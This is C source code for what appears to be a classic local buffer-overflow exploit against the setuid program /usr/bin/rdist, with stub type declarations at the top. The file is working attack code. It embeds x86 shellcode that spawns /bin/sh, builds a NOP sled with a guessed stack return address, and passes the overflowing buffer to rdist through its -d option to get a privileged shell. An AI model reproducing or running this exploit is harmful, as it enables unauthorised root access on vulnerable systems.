
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ BUFFER_SIZE ;
 int DEFAULT_OFFSET ;
 int atoi (char*) ;
 int execl (char*,char*,char*,char*,char*,char*,int *) ;
 int exit (int ) ;
 int get_esp () ;
 char* malloc (int) ;
 int memset (char*,int,scalar_t__) ;
 int printf (char*,...) ;
 int strlen (char*) ;

main(int argc, char **argv)
{
char *buff = ((void*)0);
unsigned long *addr_ptr = ((void*)0);
char *ptr = ((void*)0);
char execshell[] =
"\xeb\x23"
"\x5e"
"\x8d\x1e"
"\x89\x5e\x0b"
"\x31\xd2"
"\x89\x56\x07"
"\x89\x56\x0f"
"\x89\x56\x14"
"\x88\x56\x19"
"\x31\xc0"
"\xb0\x3b"
"\x8d\x4e\x0b"
"\x89\xca"
"\x52"
"\x51"
"\x53"
"\x50"
"\xeb\x18"
"\xe8\xd8\xff\xff\xff"
"/bin/sh"
"\x01\x01\x01\x01"
"\x02\x02\x02\x02"
"\x03\x03\x03\x03"
"\x9a\x04\x04\x04\x04\x07\x04";

int i;
int ofs = DEFAULT_OFFSET;


if(argc == 2)
ofs = atoi(argv[1]);

printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/bin/rdist", "rdist", "-d", buff, "-d", buff, ((void*)0));
}
